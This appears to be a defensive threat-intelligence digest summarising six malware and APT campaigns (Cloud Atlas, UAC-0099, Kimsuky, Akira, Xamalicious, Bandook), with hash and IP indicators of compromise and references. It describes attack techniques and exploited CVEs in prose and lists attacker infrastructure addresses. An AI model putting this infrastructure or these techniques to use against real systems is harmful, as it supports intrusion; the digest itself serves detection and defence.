Fog of Cyber Warfare: Cloud Atlas Spies Attack Russian Companies Under the guise of Supporting NWO Participants

Cloud Atlas is a pro-government advanced persistent threat (APT) group that specializes in cyber espionage and theft of confidential information. The group has been active since at least 2014 and is known for targeting organizations in Russia, Belarus, Azerbaijan, Turkey, and Slovenia. They have been observed using various tactics and techniques to carry out their attacks, including spear-phishing emails with malicious attachments and exploiting vulnerabilities in popular software.

In a recent campaign, Cloud Atlas targeted a Russian agro-industrial enterprise and a state-owned research company. The hackers sent their victims phishing emails with malicious attachments, which were carefully crafted to mimic government statements, media articles, business proposals, or advertisements. The attackers used reconnaissance documents to gather the IP information of the victims and exploited a vulnerability in CVE-2017-11882 via RTF template injection to gain initial access to the targets' systems.

Cloud Atlas is known for its simple but effective methods in carrying out spear-phishing campaigns. The group has not been observed using open-source implants in its recent campaigns, possibly to be less discriminating. The group's toolkit has not changed for years, and they continue to refine their attacks to avoid detection

IoC

    MD5

• 0957edfec31dd2dd05d484eed90593c7
• 0a850c27c8ce24c0a6fa5bcf7504dc30
• 27d49df3e0122152dc9a3f752a099f39
• 2e950fe4bd76088f89433a6f2146cb67
• 7bdb049cb0cc3623e4fa1d8e2574f1ce
• 965d5dc42ee1efdcbc52d061624526c7
• 9c5a6ede9b0ca906cbc121cc5496b714
• b0de9d6133d73c32b243cf716a7c614c
• b1995d8a9df9bd8ce23d38b0ab454580
• b3de2f04ceb97f8e9164399649433e1e
• cd8141f094cfb0dae11747ee9dc74a2f
• ddbc081392ffa41bcb3e7a007edf727b
• efd493e8ebcd66f9404338532519eb90
• f611cb1a320a9d3b5df4b70b37b0fd73

    SHA1

• 07735f3da5f5847e9df43034459e3ead4c1f3f35
• 151e9e6defac4a67be8916a1e119917b69e053ac
• 3375772e3bc60614e3e398fd019c8931d2ad83c9
• 3b2109317985de28d16aef6306ba5a788eb121bf
• 44a21627eed099a55e5592509e6e3333c5d3d339
• 53cea3a93a481a710e821d9c3e087fc18fb989f9
• 6efed9d4e8ae02808bed488566f90a4ecc361546
• 7329424eba132feebba57e239000331e886b1656
• 7c8479a818ea21fc228334dfdd55044866a95026
• 85a24692089d1a8dc6354a88b6f1e08567db6b0d
• 877f95ee15adb5540d0b50509a14d1cdf89fe3e1
• a03a699031e956b4fde1ced6309b67853a54602a
• a176a164e728c929f70ab2ffa44213625ae17172
• d59f3f2b5132ff23e3fa6d88f1b97b299af38507

REFERENCES

• https://thehackernews.com/2023/12/cloud-atlas-spear-phishing-attacks.html
• https://therecord.media/cloud-atlas-targets-russian-orgs-war-phishing
• https://www.facct.ru/blog/cloud-atlas/
• https://otx.alienvault.com/pulse/658c94713412afcbac226057

TAGS

Cloud Atlas, apt, phishing, vbs, rtf, maldoc, CVE-2017-11882, HTA

Threat Actor 'UAC-0099' Continues to Target Ukraine

The threat actor "UAC-0099" has been targeting Ukraine since mid-2022. This actor has been observed leveraging various tactics and techniques to carry out cyber attacks, including the use of a high-severity WinRAR flaw (CVE-2023-38831) to deliver the LONEPAGE malware. The group targets Ukrainian employees working for companies outside of Ukraine and has been linked to attacks against state organizations and media entities for espionage motives. The attacks involve different infection vectors, such as phishing messages containing HTA, RAR, and LNK file attachments, leading to the deployment of the LONEPAGE malware, a Visual Basic Script (VBS) capable of contacting a command-and-control (C2) server, stealing information, and taking screenshots. The threat actor's activities have been documented by the Computer Emergency Response Team of Ukraine (CERT-UA), and their attacks continue to evolve, demonstrating a high level of sophistication.

IoC

    SHA256

• 0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51
• 0acd4a9ef18f3fd1ccf440879e768089d4dd2107e1ce19d2a17a59ebed8c7f5d
• 2a3da413f9f0554148469ea715f2776ab40e86925fb68cc6279ffc00f4f410dd
• 2c2fa6b9fbb6aa270ba0f49ebb361ebf7d36258e1bdfd825bc2faeb738c487ed
• 38b49818bb95108187fb4376e9537084062207f91310cdafcb9e4b7aa0d078f9
• 39d56eab8adfe9eb244914dde42ec7f12f48836d3ba56c479ab21bdbc41025fe
• 4e8de351db362c519504509df309c7b58b891baf9cb99a3500b92fe0ef772924
• 53812d7bdaf5e8e5c1b99b4b9f3d8d3d7726d4c6c23a72fb109132d96ca725c2
• 54458ebfbe56bc932e75d6d0a5c1222286218a8ef26face40f2a0c0ec2517584
• 61a5b971a6b5f9c2b5e9a860c996569da30369ac67108d4b8a71f58311a6e1f1
• 659abb39eec218de66e2c1d917b22149ead7b743d3fe968ef840ef22318060fd
• 6a638569f831990df48669ca81fec37c6da380dbaaa6432d4407985e809810da
• 6f5f265110490158df91ca8ad429a96f8af69ca30b9e3b0d9c11d4fef74091e8
• 736c0128402d83cd3694a5f5bb02072d77385c587311274e3229e9b2fd5c5af7
• 762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378
• 86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a
• 87291b918218e01cac58ea55472d809d8cdd79266c372aebe9ee593c0f4e3b77
• 8aca535047a3a38a57f80a64d9282ace7a33c54336cd08662409352c23507602
• 96ab977f8763762af26bad2b6c501185b25916775b4ed2d18ad66b4c38bd5f0d
• 986694cad425c8f566e4e12c104811d4e8b30ce6c4c4d38f919b617b1aa66b05
• a10209c10bf373ed682a13dad4ff3aea95f0fdcd48b62168c6441a1c9f06be37
• d21aa84542303ca70b59b53e9de9f092f9001f409158a9d46a5e8ce82ab60fb6
• e34fc4910458e9378ea357baf045e9c0c21515a0b8818a5b36daceb2af464ea0
• f5f269cf469bf9c9703fe0903cda100acbb4b3e13dbfef6b6ee87a907e5fcd1b
• f75f1d4c561fcb013e262b3667982759f215ba7e714c43474755b72ed7f9d01e

    IPv4

• 147.78.46.40
• 196.196.156.2
• 2.59.222.98

REFERENCES

• https://www.deepinstinct.com/blog/threat-actor-uac-0099-continues-to-target-ukraine
• https://otx.alienvault.com/pulse/658c7d1e6e6bd875e46d467e

TAGS

powershell, uac0099, winrar, docx, ukraine, vbs, phishing, CVE-2023-38831

Analysis of Kimsuky Group's AppleSeed Malware Attack Trends

The Kimsuky Group, a North Korean-based cyber-attack group, has been known to use AppleSeed malware in their attacks since 2022. The group constantly launches spear-phishing attacks against South Korean users and has been observed using various methods to distribute malware, including JavaScript, Excel macro malware, and shortcut-type malware in LNK file format. The group has also been known to use Meterpreter and TinyNuke malware to seize control of compromised machines.

AppleSeed is a backdoor that can receive instructions from an actor-controlled server, drop additional payloads, and exfiltrate sensitive data such as files, keystrokes, and screenshots. A variant of AppleSeed named AlphaSeed, which was developed in Golang and uses chromedp for communications with the command-and-control server, has also been observed in use. The group typically uses RDP to control the infected systems, but they have also been observed installing Chrome Remote Desktop in recent cases.

The Kimsuky Group's attacks aim to steal internal information and technology from organizations. While the group typically uses spear-phishing attacks for initial access, most of their recent attacks involve the use of shortcut-type malware in LNK file format. Although LNK malware comprise a large part of recent attacks, cases using JavaScripts or malicious documents are also being detected.

IoC

    IPv4

• 104.168.145.83
• 159.100.6.137

    MD5

• 02843206001cd952472abf5ae2b981b2
• 0cce02d2d835a996ad5dfc0406b44b01
• 153383634ee35b7db6ab59cde68bf526
• 1f7d2cbfc75d6eb2c4f2b8b7a3eec1bf
• 232046aff635f1a5d81e415ef64649b7
• 4511e57ae1eacdf1c2922bf1a94bfb8d
• 4cb843f2a5b6ed7e806c69e6c25a1025
• 52ff761212eeaadcd3a95a1f8cce4030
• 58fafabd6ae8360c9d604cd314a27159
• 5d3ab2baacf2ad986ed7542eeabf3dab
• 6a968fd1608bca7255c329a0701dbf58
• 76831271eb117b77a57869c80bfd6ba6
• 7a7937f8d4dcb335e96db05b2fb64a1b
• 8aeacd58d371f57774e63d217b6b6f98
• ac99b5c1d66b5f0ddb4423c627ca8333
• ae9593c0c80e55ff49c28e28bf8bc887
• b5d3e0c3c470d2d41967229e17259c87
• b6ab96dc4778c6704b6def5db448a020
• b6f17d59f38aba69d6da55ce36406729
• c560d3371a16ef17dd79412f6ea99d3a
• cacf04cd560b70eaaf0e75f3da9a5e8f
• cafc26b215550521a12b38de38fa802b
• d4ad31f316dc4ca0e7170109174827cf
• d94c6323c3f77965451c0b7ebeb32e13
• db5fc5cf50f8c1e19141eb238e57658c
• e34669d56a13d607da1f76618eb4b27e
• e582bd909800e87952eb1f206a279e47
• ee76638004c68cfc34ff1fea2a7565a7

REFERENCES

• https://thehackernews.com/2023/12/kimsuky-hackers-deploying-appleseed.html
• https://asec.ahnlab.com/en/60054/
• https://thehackernews.com/2023/12/kimsuky-hackers-deploying-appleseed.html
• https://otx.alienvault.com/pulse/658c565578c6361b0ed9617a?utm_userid=xopxe&utm_medium=InProduct&utm_source=OTX&utm_content=Email&utm_campaign=new_pulse_from_subscribed

TAGS

kimsuky, phishing, LNK, javascript, appleseed, macro, excel, alphaseed, chrome remote desktop, backdoor, infostealer, TightVNC, TinyNuke, meterpreter

Akira, again: The ransomware that keeps on taking

Akira is a ransomware family that has been active since March 2023. It is known for its highly experienced and skilled operators who use various tactics to gain initial access, persistence, and evade defenses. The operators have been observed using compromised VPN credentials, targeting vulnerable Cisco VPNs, and creating a new domain account on the compromised system. They also use PowerTool or a KillAV tool that abuses the Zemana Discovery, PCHunter, SharpHound, AdFind, net Windows command, nltest, Advanced IP Scanner, and MASSCAN to gather system and domain information. The ransomware is named after a 1988 anime movie with the same name, and its operators use a cyberpunk aesthetic on their leak site. The ransomware targets corporate networks worldwide, encrypting sensitive files and demanding huge sums of money to retrieve the data and stop it from spreading. According to Trend Micro's open-source intelligence research, Akira ransomware actors compromised 107 organizations between April 1 to August 31, 2023. The ransomware remains active and continues to evolve.

IoC

    IPv4

• 45.227.254.26
• 80.66.88.203

    SHA256

• 1c1ef7736dd95ea9aa2dc5784dc51977a1d890c92159e16315ef15546556bcdf
• 2b02d732c6c46d8cb3758851c9e79a52761956109f55407c1a5d693a8a1af1f3
• 681697c35dbb1beba9886f5c44882ccca32dd7e9e483a381e981e7409a0e35cb
• b711f7617f507053a131a75b0971409f76663b404aa1c51bfbe2cd32f2ac8fb8
• be8257317bea80a1ed670d70eb4f21bba246c266a59724185b366c2dcfb2b8ea
• dfee389e1ffa09ed81adcf0d0f165d859e0c045ad7d90f6edcf3f96dfcceba2b

    IPv4

• 152.89.196.111
• 185.11.61.114
• 194.26.29.102
• 91.240.118.29

REFERENCES

• https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-akira
• https://darktrace.com/blog/akira-ransomware-how-darktrace-foiled-another-novel-ransomware-attack
• https://www.sentinelone.com/anthology/akira/
• https://www.trellix.com/about/newsroom/stories/research/akira-ransomware/
• https://otx.alienvault.com/pulse/658c45ad9b174d9cf1b26ce0

TAGS

winrar, winscp, veam, mega, ransomware, anydesk, ngrok

Stealth Backdoor “Android/Xamalicious” Actively Infecting Devices

According to McAfee Mobile Research Team, a new Android backdoor called "Android/Xamalicious" has been identified. It is implemented with Xamarin, an open-source framework that allows building Android and iOS apps with .NET and C#. The backdoor tries to gain accessibility privileges with social engineering and then communicates with the command-and-control server to evaluate whether or not to download a second-stage payload that’s dynamically injected as an assembly DLL at runtime level to take full control of the device and potentially perform fraudulent actions such as clicking on ads, installing apps among other actions financially motivated without user consent. The second stage payload can take full control of the infected device due to the powerful accessibility services that were already granted during the first stage which also contains functions to self-update the main APK which means that it has the potential to perform any type of activity like a spyware or banking trojan without user consent. Based on the number of installations, these apps may have compromised at least 327,000 devices from Google Play plus the installations coming from third-party markets that continually produce new infections based on the detection telemetry of McAfee clients around the world. This threat remains very active.

IoC

    MD5

• 359bbd612d493176603d04c07a85c2a3
• 54b9c0431e2c2d450d54b7307af1b94e
• 93ec54584746e28873614e2e8e34876f
• 9c25f99768fd9af907d7dd10410c58c2
• a28da4ba0f525691b41c0c27f747b938
• aae0796b4aac163ddb7b65754a446710
• d1547228961d30c5bbb2ee3f103afed6

    SHA1

• 0b50afd999b01712edce2f03c3fa76768591bd40
• 5a1e9d7fd2205d19298ec2b8990e487543a18580
• 61bed88a02468f90f8d871455ede227240c68e36
• 6bf2bf331b8ca2e265d4017e7271fb57ccd0625a
• c10445557bd3b554175e34e5cd38e4c4381be9d9
• c2477323b60f9d95203bc2110e6951ccc2c2c187
• cfdafb9945fb2153c2e0ac94e8b5b0ef8da1bbfa

    SHA256

• 01c56911c7843098777ec375bb5b0029379b0457a9675f149f339b7db823e996
• 117fded1dc51eff3788f1a3ec2b941058ce32760acf61a35152be6307f6e2052
• 19ffe895b0d1be65847e01d0e3064805732c2867ce485dfccc604432faadc443
• 1bfc02c985478b21c6713311ca9108f6c432052ea568458c8bd7582f0a825a48
• 22803693c21ee17667d764dd226177160bfc2a5d315e66dc355b7366b01df89b
• 28a4ae5c699a7d96e963ca5ceec304aa9c4e55bc661e16c194bdba9a8ad847b7
• 3201785a7de8e37e5d12e8499377cfa3a5b0fead6667e6d9079d8e99304ce815
• 5fffb10487e718634924552b46e717bbcbb6a4f9b1fed02483a6517f9acd2f61
• 6953ba04233f5cf15ab538ae191a66cb36e9e0753fcaeeb388e3c03260a64483
• 6a3455ff881338e9337a75c9f2857c33814b7eb4060c06c72839b641b347ed36
• 7149acb072fe3dcf4dcc6524be68bd76a9a2896e125ff2dddefb32a4357f47f6
• 81a9a6c86b5343a7170ae5abd15f9d2370c8282a4ed54d8d28a3e1ab7c8ae88e
• 8927ff14529f03cbb2ebf617c298f291c2d69be44a8efa4e0406dea16e53e6f9
• 899b0f186c20fdbfe445b4722f4741a5481cd3cbcb44e107b8e01367cccfdda3
• 9b4dc1e80a4f4c798d0d87a52f52e28700b5b38b38a532994f70830f24f867ba
• 9c646516dd189cab1b6ced59bf98ade42e19c56fc075e42b85d597449bc9708b

REFERENCES

• https://www.mcafee.com/blogs/other-blogs/mcafee-labs/stealth-backdoor-android-xamalicious-actively-infecting-devices/
• https://otx.alienvault.com/pulse/658c40da58889532fbfe245c

TAGS

google play, rsa key, android, cash magnet, xamalicious, xamarin, updater, pixel, tarot

Bandook - A Persistent Threat That Keeps Evolving

 Bandook is a remote access trojan that has been continuously developed since it was first detected in 2007. It has been used in various campaigns by different threat actors over the years. Recently, FortiGuard Labs identified a new Bandook variant being distributed via a PDF file that contains a shortened URL that downloads a password-protected .7z file. After the victim extracts the malware with the password in the PDF file, the malware injects its payload into msinfo32.exe. This new variant of Bandook is being distributed via a Spanish PDF file.

IoC

    MD5

• 5b49b856ed078c80306a6f190c445138
• 695ebe3e45a89552d7dabbc2b972ed66
• cc9283299523aed18b5c82c22b0b9f27
• d3577d76430cf9910df854e066331f56

    SHA1

• 33c172779ac7117e30d37a6fe26361b2175cae03
• 89f1e932cc37e4515433696e3963bb3163cc4927
• 90e8f60e0b1f19da57011fba19c04fab0614e757
• efbeec9846500b7d54d7fbc51de78b92976d1bbc

    SHA256

• 2e7998a8df9491dad978dee76c63cb1493945b9cf198d856a395ba0fae5c265a
• 3169171e671315e18949b2ff334db83f81a3962b8389253561c813f01974670b
• 430b9e91a0936978757eb8c493d06cbd2869f4e332ae00be0b759f2f229ca8ce
• 8904ce99827280e447cb19cf226f814b24b0b4eec18dd758e7fb93476b7bf8b8
• cd78f0f4869d986cf129a6c108264a3517dbcf16ecfc7c88ff3654a6c9be2bca
• d3e7b5be903eb9a596b9b2b78e5dd28390c6aadb8bdd4ea1ba3d896d99fa0057
• e87c338d926cc32c966fce2e968cf6a20c088dc6aedf0467224725ce36c9a525

    IPv4

• 45.67.34.219
• 77.91.100.237

REFERENCES

• https://www.fortinet.com/blog/threat-research/bandook-persistent-threat-that-keeps-evolving
• https://otx.alienvault.com/pulse/658c37500d4737e0ef37ec5c

TAGS

remote access trojan, bandook, appdata, c2 server, init function